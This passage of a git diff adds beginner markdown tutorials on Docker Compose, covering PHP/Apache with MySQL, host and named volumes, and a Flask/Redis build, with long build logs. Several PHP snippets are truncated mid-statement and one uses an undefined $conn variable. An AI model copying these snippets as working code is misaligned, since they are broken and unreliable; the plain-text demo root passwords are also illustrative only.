1.2s + => => extracting sha256:c17a0a78e91d3ac0ec4a0c0566f57580154ead8d8967258efe94989d86cd05bd 0.0s + => => extracting sha256:8d436d7bb0262f042a9554b5c54b25bc1d19cabbb9435747672c34d12f8dc1d0 0.2s + => => extracting sha256:5543a36f8eed548f436944bf39a2e918115fc9b30b54416c1081566f25716010 0.0s + => => extracting sha256:28135fd83ed1ac66e6f4288fabe4c84616cfe420e8e6808ba92d052771325ab4 0.0s + => => extracting sha256:485201b000c7ca5a73c2f9d047a204442ea5871a8a1405809d623884d83afc05 0.1s + => => extracting sha256:9e92e56de9f5b0243dc28d80127f51f9f773d64ce4ae1ad58cfff06c2dcd4c29 0.0s + => => extracting sha256:709f68bc1d50527b9d9de50c516cb337468feb59c6135b414dda628d902a1bc8 0.2s + => => extracting sha256:c5ff78edaefc7917757ec4e434738d5561d016bedd20ebdeeee362ec53c8d200 0.0s + => => extracting sha256:119f7607f913c50661a95311027b7b944c7bf2ee9e7af5361a14b72ce4d36b34 0.0s + => => extracting sha256:1c04bb0b5fbe7c2927e6282625ccf4c5e0399e9da46f4a84bb8072dc98add6e5 0.0s + => => extracting sha256:9639d8c8cc76eb6501b4135a054c1a85bd7397db1010d043bcc03d32bf6d79b6 0.0s + => [2/2] COPY index.php /var/www/html 0.3s + => exporting to docker image format 4.3s + => => exporting layers 0.0s + => => exporting manifest sha256:4389df930ccac33c104717e827e5a6dc3de4ef60632784ca9ea76806b1bf88b7 0.0s + => => exporting config sha256:bcbc4a7a409f828a025ca857acb752536f4cece24a93121e6a920e0c4d60050f 0.0s + => => sending tarball 4.2s + => importing to docker 2.7s +[+] Running 2/2 + β Ώ Network 1-dc_default Created 0.1s + β Ώ Container 1-dc-phpapp-1 Created 0.3s +Attaching to 1-dc-phpapp-1 +1-dc-phpapp-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.2. Set the 'ServerName' directive globally to suppress this message +1-dc-phpapp-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.2. Set the 'ServerName' directive globally to suppress this message +1-dc-phpapp-1 | [Fri Mar 03 00:44:20.034230 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/7.2.34 configured -- resuming normal operations +1-dc-phpapp-1 | [Fri Mar 03 00:44:20.034331 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +1-dc-phpapp-1 | 172.18.0.1 - - [03/Mar/2023:00:44:54 +0000] "GET / HTTP/1.1" 200 244 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +1-dc-phpapp-1 | 172.18.0.1 - - [03/Mar/2023:00:44:54 +0000] "GET /favicon.ico HTTP/1.1" 404 489 "http://localhost:8080/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +1-dc-phpapp-1 | 172.18.0.1 - - [03/Mar/2023:00:45:02 +0000] "GET / HTTP/1.1" 200 244 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +ΒΈ + + +``` + +#### open browser + +```sh +http://localhost:8080 + +``` \ No newline at end of file diff --git a/content/en/docker/a21.Docker-Compose-volumes 2.md b/content/en/docker/a21.Docker-Compose-volumes 2.md new file mode 100644 index 0000000..419be3d --- /dev/null +++ b/content/en/docker/a21.Docker-Compose-volumes 2.md @@ -0,0 +1,60 @@ +--- +title: "Docker Compose with Volume Mount" +slug: "Docker-Compose-with-Volume-Mount" +--- + +#### Lets build docker compose file + +```yml +version: '3' +services: + phpapp: + image: php:7.2-apache + ports: + - "8080:80" + volumes: + - "./:/var/www/html" +``` + +above when we do docker compose up it will start apache with php 7.2 +it will mount corrent directory to `/var/www/html` +also it mount port 80 of the container to port 8080 on the host + + +#### create index.php with following content + +```php + [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load build definition from Dockerfile.1 0.0s + => => transferring dockerfile: 58B 0.0s + => [internal] load metadata for docker.io/library/php:7.2-apache 4.7s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => CACHED [1/1] FROM docker.io/library/php:7.2-apache@sha256:4dc0f 0.0s + => => resolve docker.io/library/php:7.2-apache@sha256:4dc0f0115acf 0.0s + => exporting to docker image format 1.7s + => => exporting layers 0.0s + => => exporting manifest sha256:0ba34bb4f00dd5ff9830453180af98fe10 0.0s + => => exporting config sha256:a1c8ee68f9b1abcb72605f5bf0eee69dbf23 0.0s + => => sending tarball 1.6s + => importing to docker 0.0s +[+] Running 2/2 + β Ώ Network 3-dc-custom_default Cre... 0.1s + β Ώ Container my-php-app Created 0.1s +Attaching to my-php-app + + +``` + +#### check it out localhost 80 + + +http://localhost:8080 + + +update your existing Dockerfile with following content + +```dockerfile +FROM php:7.2-apache + +RUN apt-get -y update \ +&& apt-get install -y libicu-dev \ +&& docker-php-ext-configure intl \ +&& docker-php-ext-install intl + +RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli + + +``` + +update existing docker-compose.yml + +```bash +version: '3' +services: + phpapp: + build: + context: ./ + dockerfile: Dockerfile.2 + image: phpapp:123 + ports: + - "8080:80" + volumes: + - "./:/var/www/html" + container_name: my-php-app + +``` + +#### rebuild docker compose + +```sh +3-DC-Custom git:(main) βœ— docker compose up --build +[+] Building 43.1s (9/9) FINISHED + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load build definition from Dockerfile.2 0.0s + => => transferring dockerfile: 255B 0.0s + => [internal] load metadata for docker.io/library/php:7.2-apache 2.3s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => CACHED [1/3] FROM docker.io/library/php:7.2-apache@sha256:4dc0f 0.0s + => => resolve docker.io/library/php:7.2-apache@sha256:4dc0f0115acf 0.0s + => [2/3] RUN apt-get -y update && apt-get install -y libicu-dev & 28.9s + => [3/3] RUN docker-php-ext-install mysqli && docker-php-ext-enabl 6.9s + => exporting to docker image format 4.9s + => => exporting layers 2.3s + => => exporting manifest sha256:ee6a98e1847d8149754239ab5be0cad310 0.0s + => => exporting config sha256:2800277bcab2cb605936b4f874bff2c8251d 0.0s + => => sending tarball 2.6s + => importing to docker 0.5s +[+] Running 1/1 + β Ώ Container my-php-app Recreated 0.1s +Attaching to my-php-app +my-php-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.22.0.2. Set the 'ServerName' directive globally to suppress this message +my-php-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.22.0.2. Set the 'ServerName' directive globally to suppress this message +my-php-app | [Fri Mar 03 11:55:09.580207 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/7.2.34 configured -- resuming normal operations +my-php-app | [Fri Mar 03 11:55:09.580274 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +my-php-app | 172.22.0.1 - - [03/Mar/2023:11:55:14 +0000] "GET /mysql HTTP/1.1" 404 490 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +my-php-app | 172.22.0.1 - - [03/Mar/2023:11:55:19 +0000] "GET / HTTP/1.1" 200 23831 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" +ΒΈ^CGracefully stopping... (press Ctrl+C again to force) +Aborting on container exit... +[+] Running 1/1 + β Ώ Container my-php-app Stopped 1.2s +canceled + + +``` \ No newline at end of file diff --git a/content/en/docker/a23.php-database-docker-compose 2.md b/content/en/docker/a23.php-database-docker-compose 2.md new file mode 100644 index 0000000..47c3a5d --- /dev/null +++ b/content/en/docker/a23.php-database-docker-compose 2.md @@ -0,0 +1,219 @@ +--- +title: "Simple php apache and database using docker compose" +slug: "Simple-php-apache-and-database-using-docker-compose" +--- + +we will see detach form logs upon start and user multiservices in one docker container + +```yml +version: '3' + +services: + phpapp: + build: + context: ./ + dockerfile: Dockerfile + image: phpapp:123 + ports: + - "8080:80" + volumes: + - "./:/var/www/html" + container_name: myphpapp-app + + db: + image: mysql:5.7 + restart: always + environment: + MYSQL_ROOT_PASSWORD: my!!!root!!!pw + container_name: myphpapp-db +``` + +here you see two services `phpapp` and `myphpapp-app` and image called phpapp with 123 tag + +another service called db form mysql this container restarts always which means it crashes ? the it +restarts automatically ! + +upon start we set a password for the root user "my!!root!!pw" just fo demostrate + +create dockerfile with following content + +```dockerfile + +FROM php:7.2-apache + +RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli +``` + +crete index.php with following content + +```php +connect_errno > 0) { + echo $db->connect_error; +} else { + echo "DB Connection successful\n\n"; +} + +``` + +#### build docker compose + +```sh + docker-compose up --build +[+] Building 22.7s (7/7) FINISHED + => [internal] load build definition from dockerfile 0.0s + => => transferring dockerfile: 126B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/php:apache-buster 2.6s + => [1/2] FROM docker.io/library/php:apache-buster@sha256:386b6018bd 8.1s + => => resolve docker.io/library/php:apache-buster@sha256:386b6018bd 0.0s + => => sha256:4ba26e0fdc7f78867d9be8a223260f2d592c7be7bd 893B / 893B 0.6s + => => sha256:224f38e513c9d90e092a021139f4859652f2981083 246B / 246B 0.5s + => => sha256:652ab663764a1e05149b0df37b8389096be761 2.46kB / 2.46kB 0.5s + => => sha256:fd3bc60f67a0da00904c6206528bdfa08ff9 11.36MB / 11.36MB 3.0s + => => sha256:a30f4659f909420c63fc05831b6b4847a9cbd15932 491B / 491B 0.6s + => => sha256:5387bfe59045447db1c94ed8d5fc84eb3803 12.38MB / 12.38MB 1.9s + => => sha256:02fed234e9e5648116b0206ab71f67d6de466202ca 513B / 513B 0.5s + => => sha256:0e3638958ff4f83d56ad9a11fc474f5af5e9336f3d 474B / 474B 1.4s + => => sha256:38ce3c4babbe62c529e9a7e6e4de5ac72168 18.58MB / 18.58MB 2.0s + => => sha256:573449e685b037ec25e2637d4fe3e19e09429f5521 269B / 269B 0.6s + => => sha256:de58dc66c01f3c4357b62fc24dc75f3b14a3 70.37MB / 70.37MB 3.8s + => => sha256:ed22f951ea44cd39f81544a2f0bf196ad60d 25.92MB / 25.92MB 1.9s + => => sha256:f0071d92462e7f83ca38e778e6dff5c113712119e2 226B / 226B 0.6s + => => extracting sha256:ed22f951ea44cd39f81544a2f0bf196ad60d13c1428 0.6s + => => extracting sha256:f0071d92462e7f83ca38e778e6dff5c113712119e27 0.0s + => => extracting sha256:de58dc66c01f3c4357b62fc24dc75f3b14a32bf650f 1.2s + => => extracting sha256:573449e685b037ec25e2637d4fe3e19e09429f55213 0.0s + => => extracting sha256:38ce3c4babbe62c529e9a7e6e4de5ac72168768d161 0.3s + => => extracting sha256:0e3638958ff4f83d56ad9a11fc474f5af5e9336f3d2 0.0s + => => extracting sha256:02fed234e9e5648116b0206ab71f67d6de466202ca2 0.0s + => => extracting sha256:5387bfe59045447db1c94ed8d5fc84eb3803be624d8 0.1s + => => extracting sha256:a30f4659f909420c63fc05831b6b4847a9cbd159320 0.0s + => => extracting sha256:fd3bc60f67a0da00904c6206528bdfa08ff9515ce14 0.2s + => => extracting sha256:652ab663764a1e05149b0df37b8389096be76171a21 0.0s + => => extracting sha256:224f38e513c9d90e092a021139f4859652f2981083e 0.0s + => => extracting sha256:4ba26e0fdc7f78867d9be8a223260f2d592c7be7bdb 0.0s + => [2/2] RUN docker-php-ext-install mysqli && docker-php-ext-enable 7.8s + => exporting to docker image format 4.2s + => => exporting layers 0.0s + => => exporting manifest sha256:a328dcabf983b4d59f41482a80e08861ee4 0.0s + => => exporting config sha256:b38bdd1cd3eabf8ea442587b892d0a0d86e6d 0.0s + => => sending tarball 4.1s + => importing to docker 2.5s +[+] Running 2/2 + β Ώ Container myphpapp-db Created 0.0s + β Ώ Container myphpapp-app Recreated 0.3s +Attaching to myphpapp-app, myphpapp-db +myphpapp-db | 2023-03-03 19:30:17+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | [Fri Mar 03 19:30:17.681041 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/8.2.3 configured -- resuming normal operations +myphpapp-app | [Fri Mar 03 19:30:17.681312 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +myphpapp-db | 2023-03-03 19:30:17+00:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql' +myphpapp-db | 2023-03-03 19:30:17+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-db | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock' +myphpapp-db | 2023-03-03T19:30:18.754320Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead. +myphpapp-db | 2023-03-03T19:30:18.756720Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1 +myphpapp-db | 2023-03-03T19:30:18.764513Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started. +myphpapp-db | 2023-03-03T19:30:19.043718Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended. +myphpapp-db | 2023-03-03T19:30:19.237016Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed. +myphpapp-db | 2023-03-03T19:30:19.237069Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel. +myphpapp-db | 2023-03-03T19:30:19.238922Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory. +myphpapp-db | 2023-03-03T19:30:19.258982Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL. +myphpapp-db | 2023-03-03T19:30:19.259341Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock +myphpapp-app | 172.24.0.1 - - [03/Mar/2023:19:30:35 +0000] "GET / HTTP/1.1" 200 235 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" + +``` + +### open browser + +http://localhost:8080 + +if you see out put as DB Connection successful + +cheers ! + + +lets adda a query to select the existing database on the mariaDB server extend your index.php + +```php +connect_errno > 0) { + echo $db->connect_error; +} else { + echo "DB Connection successful\n\n"; + + //we read out the content + $result=mysqli_query($conn,"SHOW DATABASES;"); + while( $row = mysqli_fetch_row( $result ) ){ + echo $row[0]."\n"; + } +} + +``` + +rebuild your docker compose after updating your php file + + +```sh +4-DC-apache-database git:(main) βœ— docker-compose up --build +[+] Building 4.0s (8/8) FINISHED + => [internal] load build definition from dockerfile 0.0s + => => transferring dockerfile: 126B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/php:apache-buster 2.3s + => [auth] library/php:pull token for registry-1.docker.io 0.0s + => [1/2] FROM docker.io/library/php:apache-buster@sha256:386b6018bd3f73fb8f0bda3d26f76f402c36a68ed9d061b00bd7c080ea1fc951 0.0s + => => resolve docker.io/library/php:apache-buster@sha256:386b6018bd3f73fb8f0bda3d26f76f402c36a68ed9d061b00bd7c080ea1fc951 0.0s + => CACHED [2/2] RUN docker-php-ext-install mysqli && docker-php-ext-enable mysqli 0.0s + => exporting to docker image format 1.6s + => => exporting layers 0.0s + => => exporting manifest sha256:a328dcabf983b4d59f41482a80e08861ee4226b2fe131b13a87bae3ff9b86e9c 0.0s + => => exporting config sha256:b38bdd1cd3eabf8ea442587b892d0a0d86e6d54251e1724444208996488da8e6 0.0s + => => sending tarball 1.6s + => importing to docker 0.1s +[+] Running 2/0 + β Ώ Container myphpapp-app Created 0.0s + β Ώ Container myphpapp-db Created 0.0s +Attaching to myphpapp-app, myphpapp-db +myphpapp-db | 2023-03-03 19:34:00+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.24.0.3. Set the 'ServerName' directive globally to suppress this message +myphpapp-app | [Fri Mar 03 19:34:00.799408 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.38 (Debian) PHP/8.2.3 configured -- resuming normal operations +myphpapp-app | [Fri Mar 03 19:34:00.799469 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND' +myphpapp-db | 2023-03-03 19:34:00+00:00 [Note] [Entrypoint]: Switching to dedicated user 'mysql' +myphpapp-db | 2023-03-03 19:34:00+00:00 [Note] [Entrypoint]: Entrypoint script for MySQL Server 8.0.32-1.el8 started. +myphpapp-db | '/var/lib/mysql/mysql.sock' -> '/var/run/mysqld/mysqld.sock' +myphpapp-db | 2023-03-03T19:34:01.423026Z 0 [Warning] [MY-011068] [Server] The syntax '--skip-host-cache' is deprecated and will be removed in a future release. Please use SET GLOBAL host_cache_size=0 instead. +myphpapp-db | 2023-03-03T19:34:01.430139Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.32) starting as process 1 +myphpapp-db | 2023-03-03T19:34:01.437649Z 1 [System] [MY-013576] [InnoDB] InnoDB initialization has started. +myphpapp-db | 2023-03-03T19:34:01.524024Z 1 [System] [MY-013577] [InnoDB] InnoDB initialization has ended. +myphpapp-db | 2023-03-03T19:34:01.700495Z 0 [Warning] [MY-010068] [Server] CA certificate ca.pem is self signed. +myphpapp-db | 2023-03-03T19:34:01.700522Z 0 [System] [MY-013602] [Server] Channel mysql_main configured to support TLS. Encrypted connections are now supported for this channel. +myphpapp-db | 2023-03-03T19:34:01.701509Z 0 [Warning] [MY-011810] [Server] Insecure configuration for --pid-file: Location '/var/run/mysqld' in the path is accessible to all OS users. Consider choosing a different directory. +myphpapp-db | 2023-03-03T19:34:01.711706Z 0 [System] [MY-011323] [Server] X Plugin ready for connections. Bind-address: '::' port: 33060, socket: /var/run/mysqld/mysqlx.sock +myphpapp-db | 2023-03-03T19:34:01.711810Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.32' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL. +myphpapp-app | 172.24.0.1 - - [03/Mar/2023:19:34:12 +0000] "GET / HTTP/1.1" 200 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" + +``` + + +### open browser + +http://localhost:8080 \ No newline at end of file diff --git a/content/en/docker/a24.Host-Volume-mount 2.md b/content/en/docker/a24.Host-Volume-mount 2.md new file mode 100644 index 0000000..9349a22 --- /dev/null +++ b/content/en/docker/a24.Host-Volume-mount 2.md @@ -0,0 +1,244 @@ +--- +title: "Host Volume Mount - Data persistentence " +slug: "Host-Volume-Mount-Data-persistentence" +--- + +we already used database with web app but docker containers are ephermal. this means they are losing data once removed or re-started so somewhere need to find data persistent + +create `docker-compose.yml` using following content + +```yml +version: '3' +services: + db: + image: mysql:latest + restart: always + container_name: myphpapp-db + environment: + MYSQL_ROOT_PASSWORD: somepass + MYSQL_DATABASE: somedatabase + dbclient: + image: mysql:latest + depends_on: + - db + command: mysql -uroot -psomepass -hdb +``` + +MYSQL_DATABASE will create an empty database with the name "somedatabase" at first + +depends_on waits for the container to start on the other containers + + +### run the command + +```bash +5-DC-Host-Vol-mount git:(main) βœ— docker compose up -d +[+] Running 3/3 + β Ώ Network 5-dc-host-vol-mount_default Created 0.1s + β Ώ Container myphpapp-db St... 0.3s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Started 0.5s +``` + +#### check docker compose process + +```sh +5-DC-Host-Vol-mount git:(main) βœ— docker compose ps +NAME IMAGE COMMAND SERVICE CREATED STATUS PORTS +myphpapp-db mysql:latest "docker-entrypoint.s…" db About a minute ago Up About a minute 3306/tcp, 33060/tcp + + +``` + +#### open mariadb shell + +```sh + docker compose run --rm dbclient +[+] Running 1/0 + β Ώ Container myphpapp-db Running 0.0s +mysql: [Warning] Using a password on the command line interface can be insecure. +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 8 +Server version: 8.0.32 MySQL Community Server - GPL + +Copyright (c) 2000, 2023, Oracle and/or its affiliates. + +Oracle is a registered trademark of Oracle Corporation and/or its +affiliates. Other names may be trademarks of their respective +owners. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. +mysql> + +``` +#### enter following SQL queries + +```sh +mysql> USE somedatabase; +Database changed +mysql> SHOW TABLES; +Empty set (0.01 sec) + +``` +#### lets create table +```sh +mysql> CREATE TABLE mytable (id INT) ; +Query OK, 0 rows affected (0.04 sec) + +mysql> SHOW TABLES; ++------------------------+ +| Tables_in_somedatabase | ++------------------------+ +| mytable | ++------------------------+ +1 row in set (0.01 sec) +mysql> exit +``` + +#### stop and remove container + +```sh +docker-compose stop +[+] Running 2/2 + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Stopped 0.0s + β Ώ Container myphpapp-db Stopped 1.8s +5-DC-Host-Vol-mount git:(main) βœ— docker-compose rm +? Going to remove 5-dc-host-vol-mount-dbclient-1, myphpapp-db Yes +[+] Running 2/0 + β Ώ Container myphpapp-db Removed 0.0s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Removed 0.0s +➜ 5-DC-Host-Vol-mount git:(main) βœ— + +``` +### lets make data persistent even we remove container ? with volumesa nd a host mounded data directory +```sh +mkdir data + +``` +lets update docker-compose.yml + +```yml +version: '3' + +services: + db: + image: mysql:latest + restart: always + container_name: myphpapp-db + environment: + MYSQL_ROOT_PASSWORD: somepass + MYSQL_DATABASE: somedatabase + volumes: + - ./data:/var/lib/mysql + + dbclient: + image: mysql:latest + depends_on: + - db + command: mysql -uroot -psomepass -hdb +``` + +#### restart docker compose + +```sh + +docker-compose up -d +[+] Running 2/2 + β Ώ Container myphpapp-db Started 0.4s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Started + 0.7s +``` +### recreate table + +```sh +➜ 5-DC-Host-Vol-mount git:(main) βœ— docker compose run --rm dbclient +[+] Running 1/0 + β Ώ Container myphpapp-db Running 0.0s +mysql: [Warning] Using a password on the command line interface can be insecure. +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 8 +Server version: 8.0.32 MySQL Community Server - GPL + +Copyright (c) 2000, 2023, Oracle and/or its affiliates. + +Oracle is a registered trademark of Oracle Corporation and/or its +affiliates. Other names may be trademarks of their respective +owners. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> USE somedatabase; +Database changed +mysql> SHOW TABLES; +Empty set (0.01 sec) + +CREATE TABLE mytable (id INT) ; +Query OK, 0 rows affected (0.04 sec) + +mysql> SHOW TABLES; ++------------------------+ +| Tables_in_somedatabase | ++------------------------+ +| mytable | ++------------------------+ +1 row in set (0.00 sec) + +mysql> exit +``` + +#### stop and remove the container + +```sh +5-DC-Host-Vol-mount git:(main) βœ— docker compose stop +[+] Running 2/2 + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Stopped 0.0s + β Ώ Container myphpapp-db Stopped 2.0s +➜ 5-DC-Host-Vol-mount git:(main) βœ— docker compose rm +? Going to remove 5-dc-host-vol-mount-dbclient-1, myphpapp-db Yes +[+] Running 2/0 + β Ώ Container myphpapp-db Removed 0.0s + β Ώ Container 5-dc-host-vol-mount-dbclient-1 Removed 0.0s +➜ 5-DC-Host-Vol-mount git:(main) βœ— + +``` +#### lets start db container again + +```sh +docker compose run --rm dbclient +[+] Running 1/0 + β Ώ Container myphpapp-db Running 0.0s +mysql: [Warning] Using a password on the command line interface can be insecure. +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 8 +Server version: 8.0.32 MySQL Community Server - GPL + +Copyright (c) 2000, 2023, Oracle and/or its affiliates. + +Oracle is a registered trademark of Oracle Corporation and/or its +affiliates. Other names may be trademarks of their respective +owners. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> + +``` + +#### lets data is persistent or not + +```sh +USE somedatabase; +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> SHOW TABLES; ++------------------------+ +| Tables_in_somedatabase | ++------------------------+ +| mytable | ++------------------------+ +1 row in set (0.00 sec) + +mysql> exit + +``` \ No newline at end of file diff --git a/content/en/docker/a25.Name-volume-mount 2.md b/content/en/docker/a25.Name-volume-mount 2.md new file mode 100644 index 0000000..f8d95eb --- /dev/null +++ b/content/en/docker/a25.Name-volume-mount 2.md @@ -0,0 +1,97 @@ +--- +title: "Named Volume Mount - Data persistentence " +description: "Named volume sharing data" +slug: "Named-Volume-Mount-Data-persistentence" +--- + +### create volume + +```sh + 6-DC-name-volume git:(main) βœ— docker volume create --name my-vol +my-vol +``` + + +#### create docker-compose.yml with following content + +```yml +version: '3.7' + +services: + db: + image: mysql:latest + restart: always + container_name: myphpapp-db + environment: + MYSQL_ROOT_PASSWORD: somepass + MYSQL_DATABASE: somedatabase + volumes: + - my-vol:/var/lib/mysql + +volumes: + my-vol: + name: my-vol +``` + +#### run docker compose + +```sh + +docker compose up -d +WARN[0000] volume "my-vol" already exists but was not created by Docker Compose. Use `external: true` to use an existing volume +[+] Running 1/1 + β Ώ Container myphpapp-db Started 0.3s +➜ 6-DC-name-volume git:(main) βœ— + +``` +#### start new container with ubuntu +```sh +docker run -v my-vol:/mydata --rm -it ubuntu /bin/bash +``` + +show the database data files + +```sh +root@1666e5d6f315:/# cd mydata/ +root@1666e5d6f315:/mydata# ls +'#ib_16384_0.dblwr' binlog.000001 client-cert.pem mysql public_key.pem undo_001 +'#ib_16384_1.dblwr' binlog.000002 client-key.pem mysql.ibd server-cert.pem undo_002 +'#innodb_redo' binlog.index ib_buffer_pool mysql.sock server-key.pem +'#innodb_temp' ca-key.pem ibdata1 performance_schema somedatabase + auto.cnf ca.pem ibtmp1 private_key.pem sys +root@1666e5d6f315:/mydata# +root@1666e5d6f315:/mydata# exit +exit +``` + +### share data between two containers? lets try ? + +```sh +6-DC-name-volume git:(main) βœ— docker volume create --name Datastore1 +Datastore1 +``` +#### open a shell woth datastore1 in /mydatabase +```sh +docker run -v Datastore1:/mydatastore --rm -it ubuntu /bin/bash +``` +#### write a new text file + +```sh +echo "hello datastore1" > /mydatastore/hello.txt +root@4b119677c00b:/# ls +bin boot dev etc home lib media mnt mydatastore opt proc root run sbin srv sys tmp usr var +root@4b119677c00b:/# cat mydatastore/hello.txt +hello datastore1 +root@4b119677c00b:/# + +``` + +#### add another line + +```sh +root@4b119677c00b:/# echo "\n\nhello datastore 2" >> /mydatastore/hello.txt +root@4b119677c00b:/# cat mydatastore/hello.txt +hello datastore1 +\n\nhello datastore 2 +root@4b119677c00b:/# +``` \ No newline at end of file diff --git a/content/en/docker/a26.docker-compose-build 2.md b/content/en/docker/a26.docker-compose-build 2.md new file mode 100644 index 0000000..f5501e4 --- /dev/null +++ b/content/en/docker/a26.docker-compose-build 2.md @@ -0,0 +1,143 @@ +--- +title: "Docker Compose CLI - Build Command " +description: " Docker Compose Build Command " +slug: "Docker-Compose-CLI-Build-Command" +--- + + +### Docker Compose Build Command + +```sh +docker compose build [OPTIONS] [SERVICE...] + +``` + +If you change a service’s Dockerfile or the contents of its build directory, run docker compose build to rebuild it. + +`--build-arg` Set build-time variables for services.
+`--no-cache ` Do not use cache when building the image +`--progress auto` Set type of progress output (auto, tty, plain, quiet) .
+`--pull ` Always attempt to pull a newer version of the image..
+`--push ` Push service images..
+`--quiet , -q` Don’t print anything to STDOUT.
+`--ssh ` Set SSH authentications used when building .service images. (use β€˜default’ for using your default SSH Agent) + + +#### create dockerfile with following content + + +```dockerfile +# syntax=docker/dockerfile:1 +FROM python:3.7-alpine +WORKDIR /code +ENV FLASK_APP=app.py +ENV FLASK_RUN_HOST=0.0.0.0 +RUN apk add --no-cache gcc musl-dev linux-headers +COPY requirements.txt requirements.txt +RUN pip install -r requirements.txt +EXPOSE 5000 +COPY . . +CMD ["flask", "run"] + +``` + +create app.py with following content + + +```python +import time + +import redis +from flask import Flask + +app = Flask(__name__) +cache = redis.Redis(host='redis', port=6379) + +def get_hit_count(): + retries = 5 + while True: + try: + return cache.incr('hits') + except redis.exceptions.ConnectionError as exc: + if retries == 0: + raise exc + retries -= 1 + time.sleep(0.5) + +@app.route('/') +def hello(): + count = get_hit_count() + return 'Hello World! I have been seen {} times.\n'.format(count) + + +``` + +#### create requirements.txt with following content + + +```txt +flask +redis + +``` + +create docker-compose.yml with following content + +```yml +version: "3.9" +services: + web: + build: . + ports: + - "8000:5000" + redis: + image: "redis:alpine" +``` + +### docker compose build + +```sh + + 7-DC-CLI git:(main) βœ— docker compose build +[+] 